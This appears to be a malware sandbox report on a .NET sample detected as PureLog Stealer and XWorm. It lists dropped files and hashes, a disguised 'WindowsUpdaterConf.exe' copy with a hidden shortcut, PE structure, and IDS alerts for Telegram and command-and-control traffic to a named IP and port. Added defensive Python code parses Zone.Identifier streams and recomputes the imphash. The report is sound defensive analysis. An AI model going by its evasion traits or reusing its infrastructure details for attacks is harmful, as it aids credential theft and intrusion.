                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                         (Six further dropped files, each written by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, with exactly the same size, entropy, hashes and preview as the entry above: the AppLocker policy test script that every PowerShell process writes at start-up. Their entries are identical to the one above and are not repeated here.)
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 5 17:40:32 2024, mtime=Thu Dec 5 17:40:32 2024, atime=Thu Dec 5 17:40:32 2024, length=3507712, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):814
                                                                                        Entropy (8bit):5.15780255210316
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:841X4lT1+Oj6CIUlqi9Eg9jA6iwRaW+EgWawuLvqAnenG44t2YZ/elFlSJmZmV:8tlBgnUlXEEA6iwRD+EKPqIuVqyFm
                                                                                        MD5:19360AC82919CA72B1045AB755EF69A8
                                                                                        SHA1:D957BEAAAC961491963D67222F9581B5ADCAD361
                                                                                        SHA-256:A37C41366EE17EE998748B91868FDCCAC84F51FC3953B583588274AC924D6501
                                                                                        SHA-512:3E566204D27E43FAC20D5A80388EF258119034634E16C1628E2B0751A0A7ECD06B254962DA0972093C4E7F62AFD145C9EAC710C0082896A4AC10874710C472AD
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... .....!*EG....!*EG....!*EG....5.......................:..DG..Yr?.D..U..k0.&...&......vk.v......!*EG....*EG......t.".CFSF..2...5..Y.. .WINDOW~1.EXE....t.Y^...H.g.3..(.....gVA.G..k...^......Y...Y............................C...W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e...H...T...............-.......S.............c......C:\Users\user\WindowsUpdaterConf.exe..+.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.........|....I.J.H..K..:...`.......X.......549163...........hT..CrF.f4... .H.]]8....,.......hT..CrF.f4... .H.]]8....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3507712
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        MD5:7823E902900881094372948957825FE1
                                                                                        SHA1:297A663F3B64FB9863164D10AC698BEF03DD3A0F
                                                                                        SHA-256:92D36E5FB3FDBF10AD10C7880C40013C2E21B8A49E20720137D2B4851681233F
                                                                                        SHA-512:60D4EA35CFEC5154CFA3CB767DE7C839CA8B3987B27599EA218EC1C47F1D111A59F193CD3CFD1266AE384434AE653F1E0A297F7222A2592E529B2B4404DD6238
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@...................................5.K.....5.......................5...................................................... ............... ..H............text....z5.. ...|5................. ..`.rsrc.........5......~5.............@....reloc........5.......5.............@..B..................5.....H........B..h...........p...&............................................(.M..*..0..G.............~?...(.M..&.0...&~@...(.M..~....~....~C...(.M....~D...(.M.......*............0........*....(....*..(.M..*.....*.................................#...~E...(.M.........8:............~F...(.M..9......~....a.....~G...(.M..o.......X.......i?.....~H...(.M..*.......*....(....*.6(.M.........*......*................i........8.............i].a...X....i?.....*.......*....(....*..(.M..*.....
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
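The 26-byte stream above is a Zone.Identifier alternate data stream, and the sandbox attributes it to file.exe itself rather than to a browser. Its ZoneId=0 (local machine) means that whatever file it is attached to carries no Mark-of-the-Web, so SmartScreen and Office Protected View stay silent on it; a browser download would carry ZoneId=3 together with ReferrerUrl and HostUrl lines. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses such a stream, returns the MOTW verdict, and runs a small check over constructed records. The stream texts are modelled on the preview, the target paths and writer processes are hypothetical (the report does not say which file this stream belongs to), and the function names are mine.

```python
# Added example: triage Zone.Identifier streams for stripped Mark-of-the-Web.

# URLZONE values Windows stores in the ZoneId field.
ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}

# Constructed stream contents (not copied from the report). The first is
# modelled on the 26-byte preview "[ZoneTransfer]....ZoneId=0" above; the
# second is the form a browser download leaves behind.
DROPPED_STREAM = "[ZoneTransfer]\r\nZoneId=0\r\n"
BROWSER_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                  "ReferrerUrl=https://example.invalid/\r\n"
                  "HostUrl=https://example.invalid/setup.exe\r\n")

# Writers that legitimately stamp downloads; anything else setting a low
# zone on an executable deserves a look.
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream into the keys of its [ZoneTransfer] section.
    Blank lines and CRLF/LF endings are tolerated; a missing section is an error."""
    in_section = seen = False
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1] == "ZoneTransfer"
            seen = seen or in_section
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    if not seen:
        raise ValueError("no [ZoneTransfer] section")
    return fields


def motw_verdict(fields: dict):
    """Return (has_motw, description). Windows treats ZoneId 3 and 4 as
    Mark-of-the-Web; lower zones get no SmartScreen or Protected View handling."""
    try:
        zone = int(fields.get("ZoneId", "0"))
    except ValueError:
        zone = 0
    return zone >= 3, f"ZoneId={zone} ({ZONES.get(zone, 'unknown zone')})"


def flag_stripped_motw(records):
    """Records are (target path, writer process, stream text). Report
    executables or shortcuts that a non-browser process stamped with a zone
    below 3, which is the pattern the dropped-file entry above shows."""
    hits = []
    for path, writer, stream in records:
        has_motw, desc = motw_verdict(parse_zone_identifier(stream))
        risky_type = path.lower().endswith((".exe", ".dll", ".lnk", ".ps1"))
        by_browser = writer.lower().endswith(BROWSERS)
        if risky_type and not has_motw and not by_browser:
            hits.append((path, writer, desc))
    return hits


# Hypothetical records modelled on the report's Process column; the report
# does not say which file this stream is attached to.
RECORDS = [
    (r"C:\Users\user\WindowsUpdaterConf.exe",
     r"C:\Users\user\Desktop\file.exe", DROPPED_STREAM),
    (r"C:\Users\user\Downloads\setup.exe",
     r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", BROWSER_STREAM),
]

if __name__ == "__main__":
    for path, writer, desc in flag_stripped_motw(RECORDS):
        print(f"MOTW absent on {path}: {desc}, written by {writer}")
```

On a live host the stream text comes from `Get-Content -Stream Zone.Identifier <path>` (or `dir /r`), and the writer process from Sysmon Event ID 15 (FileCreateStreamHash), which records both the stream contents and the creating image.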
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3507712
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        MD5:7823E902900881094372948957825FE1
                                                                                        SHA1:297A663F3B64FB9863164D10AC698BEF03DD3A0F
                                                                                        SHA-256:92D36E5FB3FDBF10AD10C7880C40013C2E21B8A49E20720137D2B4851681233F
                                                                                        SHA-512:60D4EA35CFEC5154CFA3CB767DE7C839CA8B3987B27599EA218EC1C47F1D111A59F193CD3CFD1266AE384434AE653F1E0A297F7222A2592E529B2B4404DD6238
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\WindowsUpdaterConf.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@...................................5.K.....5.......................5...................................................... ............... ..H............text....z5.. ...|5................. ..`.rsrc.........5......~5.............@....reloc........5.......5.............@..B..................5.....H........B..h...........p...&............................................(.M..*..0..G.............~?...(.M..&.0...&~@...(.M..~....~....~C...(.M....~D...(.M.......*............0........*....(....*..(.M..*.....*.................................#...~E...(.M.........8:............~F...(.M..9......~....a.....~G...(.M..o.......X.......i?.....~H...(.M..*.......*....(....*.6(.M.........*......*................i........8.............i].a...X....i?.....*.......*....(....*..(.M..*.....
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465612679391392
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cIXfpi67eLPU9skLmb0b4MWSPKaJG8nAgejZMMhA2gX4WABl0uNDdwBCswSbV:hXD94MWlLZMM6YFHB+V
                                                                                        MD5:40A448533EDD58F024831DAB7D6C1727
                                                                                        SHA1:0543C67282582B9A449EBD12A367EECB83E96EB8
                                                                                        SHA-256:9D61EE7E010C05DD48D6FF148AFB49B09B4F58833F4DF4F0AB0F5BB673DE5640
                                                                                        SHA-512:27B1F993F3D620A499070B8D99EF0A9F83834E1947CA40C5B87C51AD81B2A978F5844ABFC15A11219D55273F667F26A5F11E597C03A11FC9508FFB6AE1C73730
                                                                                        Malicious:false
                                                                                        Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..H.EG..............................................................................................................................................................................................................................................................................................................................................m:_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:file.exe
                                                                                        File size:3'507'712 bytes
                                                                                        MD5:7823e902900881094372948957825fe1
                                                                                        SHA1:297a663f3b64fb9863164d10ac698bef03dd3a0f
                                                                                        SHA256:92d36e5fb3fdbf10ad10c7880c40013c2e21b8a49e20720137d2b4851681233f
                                                                                        SHA512:60d4ea35cfec5154cfa3cb767de7c839ca8b3987b27599ea218ec1c47f1d111a59f193cd3cfd1266ae384434ae653f1e0a297f7222a2592e529b2b4404dd6238
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        TLSH:35F552C2C1E04AA1DBA01D7A5B6AD3591AD60767CA56E351C73F12F31F22F3C21B81E6
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@................................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x7599fe
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6751EED8 [Thu Dec 5 18:20:08 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
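The Import Hash above and the `jmp dword ptr [00402000h]` that opens the entry-point listing below are two sides of the same fact: a managed PE32 carries exactly one native import, mscoree!_CorExeMain, and its entry point is a six-byte indirect jump through that IAT slot (image base 0x400000 plus RVA 0x2000); the zero bytes that follow are padding, which the listing prints as `add byte ptr [eax], al`. The imphash therefore identifies the .NET loader shell, not this sample, and is no use for pivoting between PureLog or XWorm builds; the TLSH and SSDEEP values the report lists, or a .NET-specific TypeRef hash, are the values to pivot on. The Python below is an added example, not part of the Joe Sandbox report: it decodes an FF 25 stub from constructed bytes (the report shows only the disassembly, so the byte string is modelled, not copied from the sample) and recomputes the pefile-style imphash for the single mscoree import. The function names are mine.

```python
# Added example: decode the CLR entry stub and reproduce the .NET imphash.
import hashlib
import struct

IMAGE_BASE = 0x400000   # "Imagebase:0x400000" in the report
IAT_RVA = 0x2000        # 0x00402000 (the jmp target) minus the image base

# Constructed bytes modelled on the "Instruction" listing: FF 25 followed by a
# 4-byte absolute address is an indirect jmp; the zero bytes behind it are
# padding, which a linear disassembler prints as "add byte ptr [eax], al".
ENTRY_STUB = bytes.fromhex("ff25002040000000000000000000")

# A managed PE32's only native import, which is all the imphash ever sees.
DOTNET_IMPORTS = [("mscoree.dll", "_CorExeMain")]


def decode_entry_stub(code: bytes, image_base: int):
    """Return the RVA of the IAT slot an FF 25 stub jumps through,
    or None when the bytes are not an indirect jmp."""
    if len(code) < 6 or code[:2] != b"\xff\x25":
        return None
    return struct.unpack_from("<I", code, 2)[0] - image_base


def is_clr_entry_stub(code: bytes, image_base: int, iat_rva: int = IAT_RVA) -> bool:
    """True when the entry point is the standard native stub of a .NET PE32."""
    return decode_entry_stub(code, image_base) == iat_rva


def imphash(imports) -> str:
    """pefile-compatible import hash over (dll, function) pairs: lower-case,
    DLL extension stripped for dll/ocx/sys, 'dll.func' joined by commas, MD5."""
    parts = []
    for dll, func in imports:
        name = dll.lower()
        stem, _, ext = name.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            name = stem
        parts.append(f"{name}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


if __name__ == "__main__":
    rva = decode_entry_stub(ENTRY_STUB, IMAGE_BASE)
    print(f"entry stub jumps through IAT RVA 0x{rva:x}; CLR stub: "
          f"{is_clr_entry_stub(ENTRY_STUB, IMAGE_BASE)}")
    print("imphash of a .NET PE32:", imphash(DOTNET_IMPORTS))
```

The imphash printed is the value the report shows; every .NET executable that imports only _CorExeMain produces it, so a match on it says nothing about the sample's family.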
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                         add byte ptr [eax], al   ; repeated: the bytes after the 6-byte jmp stub are zero padding, and 00 00 decodes as add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3599b0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x35a000 | 0x4f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x35c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x357a04 | 0x357c00 | c6e0fa529647ba2c45f66eb99c32a565 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x35a000 | 0x4f0 | 0x600 | a9d82a0f2d35672e1ff9f7c6ffc523eb | False | 0.3795572916666667 | data | 3.803200380192977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x35c000 | 0xc | 0x200 | 16df37463a82b6da56900d9e0a61a11d | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x35a0a0 | 0x264 | data | | | 0.46405228758169936
RT_MANIFEST | 0x35a304 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T19:40:35.861908+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.4 | 49740 | 149.154.167.220 | 443 | TCP
2024-12-05T19:40:48.866202+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:40:49.279298+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:40:49.322470+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:01.792137+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:01.794410+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:06.078519+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:06.078519+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:14.306493+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:14.308474+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:26.820479+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:26.822739+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:36.074500+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:36.074500+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:39.346854+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:39.348559+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:44.039426+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.042422+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:44.186711+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.189182+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:44.354657+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:44.357039+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:49.930287+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:49.932460+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.493925+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:50.504394+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.604514+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:50.627833+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
